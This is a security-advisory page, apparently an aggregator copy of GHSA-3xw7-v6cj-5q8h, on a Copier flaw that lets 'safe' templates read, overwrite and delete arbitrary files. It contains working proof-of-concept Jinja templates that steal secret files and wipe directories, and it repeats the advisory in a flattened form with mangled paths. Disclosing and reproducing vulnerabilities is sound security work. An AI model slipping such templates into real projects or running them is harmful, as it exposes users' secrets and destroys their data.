Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-3xw7-v6cj-5q8h: Copier's safe template has arbitrary filesystem read/write access

Impact

Copier’s current security model shall restrict filesystem access through Jinja:

  • Files can only be read using {% include ... %}, which is limited by Jinja to reading files from the subtree of the local template clone in our case.
  • Files are written in the destination directory according to their counterparts in the template.

Copier suggests that it’s safe to generate a project from a safe template, i.e. one that doesn’t use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently read and write arbitrary files because we expose a few pathlib.Path objects in the Jinja context which have unconstrained I/O methods. This effectively renders our security model w.r.t. filesystem access useless.

Arbitrary read access

Imagine, e.g., a malicious template author who creates a template that reads SSH keys or other secrets from well-known locations, perhaps “masks” them with Base64 encoding to reduce detection risk, and hopes for a user to push the generated project to a public location like github.com where the template author can extract the secrets.

Reproducible example:

  • Read known file:

    echo "s3cr3t" > secret.txt
    mkdir src/
    echo "stolen secret: {{ (_copier_conf.dst_path / '..' / 'secret.txt').resolve().read_text('utf-8') }}" > src/stolen-secret.txt.jinja
    uvx copier copy src/ dst/
    cat dst/stolen-secret.txt
    
  • Read unknown file(s) via globbing:

    mkdir secrets/
    echo "s3cr3t #1" > secrets/secret1.txt
    echo "s3cr3t #2" > secrets/secret2.txt
    mkdir src/
    cat <<'EOF' > src/stolen-secrets.txt.jinja
    stolen secrets:
    {% set parent = (_copier_conf.dst_path / '..' / 'secrets').resolve() %}
    {% for f in parent.glob('*.txt') %}
    {{ f }}: {{ f.read_text('utf-8') }}
    {% endfor %}
    EOF
    uvx copier copy src/ dst/
    cat dst/stolen-secrets.txt
    

Arbitrary write access

Imagine, e.g., a malicious template author who creates a template that overwrites or even deletes files to cause havoc.

Reproducible examples:

  • Overwrite known file:

    echo "s3cr3t" > secret.txt
    mkdir src/
    echo "{{ (_copier_conf.dst_path / '..' / 'secret.txt').resolve().write_text('OVERWRITTEN', 'utf-8') }}" > src/malicious.txt.jinja
    uvx copier copy src/ dst/
    cat secret.txt
    
  • Overwrite unknown file(s) via globbing:

    echo "s3cr3t" > secret.txt
    mkdir src/
    cat <<'EOF' > src/malicious.txt.jinja
    {% set parent = (_copier_conf.dst_path / '..').resolve() %}
    {% for f in (parent.glob('*.txt') | list) %}
    {{ f.write_text('OVERWRITTEN', 'utf-8') }}
    {% endfor %}
    EOF
    uvx copier copy src/ dst/
    cat secret.txt
    
  • Delete unknown file(s) via globbing:

    echo "s3cr3t" > secret.txt
    mkdir src/
    cat <<'EOF' > src/malicious.txt.jinja
    {% set parent = (_copier_conf.dst_path / '..').resolve() %}
    {% for f in (parent.glob('*.txt') | list) %}
    {{ f.unlink() }}
    {% endfor %}
    EOF
    uvx copier copy src/ dst/
    cat secret.txt
    
  • Delete unknown files and directories via tree walking:

    mkdir data
    mkdir data/a
    mkdir data/a/b
    echo "foo" > data/foo.txt
    echo "bar" > data/a/bar.txt
    echo "baz" > data/a/b/baz.txt
    tree data/
    mkdir src/
    cat <<'EOF' > src/malicious.txt.jinja
    {% set parent = (_copier_conf.dst_path / '..' / 'data').resolve() %}
    {% for root, dirs, files in parent.walk(top_down=False) %}
    {% for name in files %}
    {{ (root / name).unlink() }}
    {% endfor %}
    {% for name in dirs %}
    {{ (root / name).rmdir() }}
    {% endfor %}
    {% endfor %}
    EOF
    uvx copier copy src/ dst/
    tree data/
    
ghsa
#git#auth#ssh

Impact

Copier’s current security model shall restrict filesystem access through Jinja:

  • Files can only be read using {% include … %}, which is limited by Jinja to reading files from the subtree of the local template clone in our case.
  • Files are written in the destination directory according to their counterparts in the template.

Copier suggests that it’s safe to generate a project from a safe template, i.e. one that doesn’t use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,–trust flag. As it turns out, a safe template can currently read and write arbitrary files because we expose a few pathlib.Path objects in the Jinja context which have unconstrained I/O methods. This effectively renders our security model w.r.t. filesystem access useless.

Arbitrary read access

Imagine, e.g., a malicious template author who creates a template that reads SSH keys or other secrets from well-known locations, perhaps “masks” them with Base64 encoding to reduce detection risk, and hopes for a user to push the generated project to a public location like github.com where the template author can extract the secrets.

Reproducible example:

  • Read known file:

    echo “s3cr3t” > secret.txt mkdir src/ echo “stolen secret: {{ (_copier_conf.dst_path / ‘…’ / ‘secret.txt’).resolve().read_text(‘utf-8’) }}” > src/stolen-secret.txt.jinja uvx copier copy src/ dst/ cat dst/stolen-secret.txt

  • Read unknown file(s) via globbing:

    mkdir secrets/ echo “s3cr3t #1” > secrets/secret1.txt echo “s3cr3t #2” > secrets/secret2.txt mkdir src/ cat <<’EOF’ > src/stolen-secrets.txt.jinja stolen secrets: {% set parent = (_copier_conf.dst_path / ‘…’ / ‘secrets’).resolve() %} {% for f in parent.glob(‘*.txt’) %} {{ f }}: {{ f.read_text(‘utf-8’) }} {% endfor %} EOF uvx copier copy src/ dst/ cat dst/stolen-secrets.txt

Arbitrary write access

Imagine, e.g., a malicious template author who creates a template that overwrites or even deletes files to cause havoc.

Reproducible examples:

  • Overwrite known file:

    echo “s3cr3t” > secret.txt mkdir src/ echo “{{ (_copier_conf.dst_path / ‘…’ / ‘secret.txt’).resolve().write_text('OVERWRITTEN’, ‘utf-8’) }}” > src/malicious.txt.jinja uvx copier copy src/ dst/ cat secret.txt

  • Overwrite unknown file(s) via globbing:

    echo “s3cr3t” > secret.txt mkdir src/ cat <<’EOF’ > src/malicious.txt.jinja {% set parent = (_copier_conf.dst_path / ‘…’).resolve() %} {% for f in (parent.glob(‘*.txt’) | list) %} {{ f.write_text('OVERWRITTEN’, ‘utf-8’) }} {% endfor %} EOF uvx copier copy src/ dst/ cat secret.txt

  • Delete unknown file(s) via globbing:

    echo “s3cr3t” > secret.txt mkdir src/ cat <<’EOF’ > src/malicious.txt.jinja {% set parent = (_copier_conf.dst_path / ‘…’).resolve() %} {% for f in (parent.glob(‘*.txt’) | list) %} {{ f.unlink() }} {% endfor %} EOF uvx copier copy src/ dst/ cat secret.txt

  • Delete unknown files and directories via tree walking:

    mkdir data mkdir data/a mkdir data/a/b echo “foo” > data/foo.txt echo “bar” > data/a/bar.txt echo “baz” > data/a/b/baz.txt tree data/ mkdir src/ cat <<’EOF’ > src/malicious.txt.jinja {% set parent = (_copier_conf.dst_path / ‘…’ / ‘data’).resolve() %} {% for root, dirs, files in parent.walk(top_down=False) %} {% for name in files %} {{ (root / name).unlink() }} {% endfor %} {% for name in dirs %} {{ (root / name).rmdir() }} {% endfor %} {% endfor %} EOF uvx copier copy src/ dst/ tree data/

References

  • GHSA-3xw7-v6cj-5q8h
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55201
  • copier-org/copier@3feea3b

ghsa: Latest News

GHSA-vxq6-8cwm-wj99: LibreNMS allows stored XSS in Alert Template name field